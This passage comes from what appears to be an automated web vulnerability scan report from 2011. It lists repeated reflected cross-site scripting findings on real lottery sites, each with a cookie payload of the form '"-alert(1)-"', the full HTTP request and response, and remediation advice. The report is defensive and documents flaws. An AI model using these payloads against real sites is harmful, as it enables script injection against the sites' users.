<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMe5ddf"-alert(1)-"c8dcab5784e";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.425. http://www.scratchcardheaven.com/UnderAge.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /UnderAge.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bea86"-alert(1)-"b9a0cab5f85 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMbea86"-alert(1)-"b9a0cab5f85; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMbea86"-alert(1)-"b9a0cab5f85; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:01 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:01 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:01 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44075


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMbea86"-alert(1)-"b9a0cab5f85";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.426. http://www.svenskalotter.com/ [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7cec3"-alert(1)-"c018451af4e was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM7cec3"-alert(1)-"c018451af4e; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/
Set-Cookie: BO=FM7cec3"-alert(1)-"c018451af4e; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34581


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM7cec3"-alert(1)-"c018451af4e";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.427. http://www.svenskalotter.com/ [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4230c"-alert(1)-"197708d1428 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM4230c"-alert(1)-"197708d1428; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM4230c"-alert(1)-"197708d1428; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:12 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:12 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:12 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:12 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:12 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34581


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM4230c"-alert(1)-"197708d1428";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.428. http://www.svenskalotter.com/AboutUs.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /AboutUs.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2ded"-alert(1)-"175d0560975 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMd2ded"-alert(1)-"175d0560975; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/
Set-Cookie: BO=FMd2ded"-alert(1)-"175d0560975; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37486


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMd2ded"-alert(1)-"175d0560975";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.429. http://www.svenskalotter.com/AboutUs.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /AboutUs.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f308"-alert(1)-"412c887e86b was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM1f308"-alert(1)-"412c887e86b; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM1f308"-alert(1)-"412c887e86b; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:16 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:16 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:16 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:16 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:16 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37486


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM1f308"-alert(1)-"412c887e86b";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.430. http://www.svenskalotter.com/Affiliates.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Affiliates.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9c29"-alert(1)-"6e0a70727e3 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Affiliates.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMb9c29"-alert(1)-"6e0a70727e3; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:35 GMT; path=/
Set-Cookie: BO=FMb9c29"-alert(1)-"6e0a70727e3; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:35 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:35 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:35 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:35 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35207


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMb9c29"-alert(1)-"6e0a70727e3";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.431. http://www.svenskalotter.com/Affiliates.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Affiliates.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44017"-alert(1)-"cadece065c0 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Affiliates.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM44017"-alert(1)-"cadece065c0; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM44017"-alert(1)-"cadece065c0; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35207


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM44017"-alert(1)-"cadece065c0";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.432. http://www.svenskalotter.com/Charity.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Charity.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc1a2"-alert(1)-"ba279956fa6 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Charity.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMcc1a2"-alert(1)-"ba279956fa6; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:26 GMT; path=/
Set-Cookie: BO=FMcc1a2"-alert(1)-"ba279956fa6; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:26 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:26 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:26 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:26 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36070


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMcc1a2"-alert(1)-"ba279956fa6";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.433. http://www.svenskalotter.com/Charity.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Charity.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd193"-alert(1)-"6cdf693f8ec was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Charity.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PMbd193"-alert(1)-"6cdf693f8ec; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMbd193"-alert(1)-"6cdf693f8ec; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36070


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMbd193"-alert(1)-"6cdf693f8ec";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.434. http://www.svenskalotter.com/ContactUsMail.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /ContactUsMail.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c7ef"-alert(1)-"ff3f13efa1c was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM9c7ef"-alert(1)-"ff3f13efa1c; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:31 GMT
Server: Microsoft-IIS/6.0
